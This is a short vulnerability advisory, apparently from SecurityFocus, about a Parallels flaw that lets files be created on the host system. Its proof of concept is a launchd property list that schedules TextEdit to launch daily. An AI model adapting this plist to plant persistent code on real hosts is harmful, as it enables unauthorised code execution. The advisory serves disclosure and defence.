source: https://www.securityfocus.com/bid/22597/info
Parallels is prone to an arbitrary code-execution vulnerability because of a design flaw in the affected application.
An attacker can exploit this issue to create files in the host operating system. This could result in the execution of code.
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple Computer//DTD PLIST 1.0//EN" "http://
www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
<key>Label</key>
<string>com.apple.test</string>
<key>LowPriorityIO</key>
<true/>
<key>Nice</key>
<integer>1</integer>
<key>ProgramArguments</key>
<array>
<string>/Applications/TextEdit.app/Contents/MacOS/TextEdit</string>
<string>daily</string>
</array>
<key>StartCalendarInterval</key>
<dict>
<key>Hour</key>
<integer>18</integer>
<key>Minute</key>
<integer>0</integer>
</dict>
</dict>
</plist>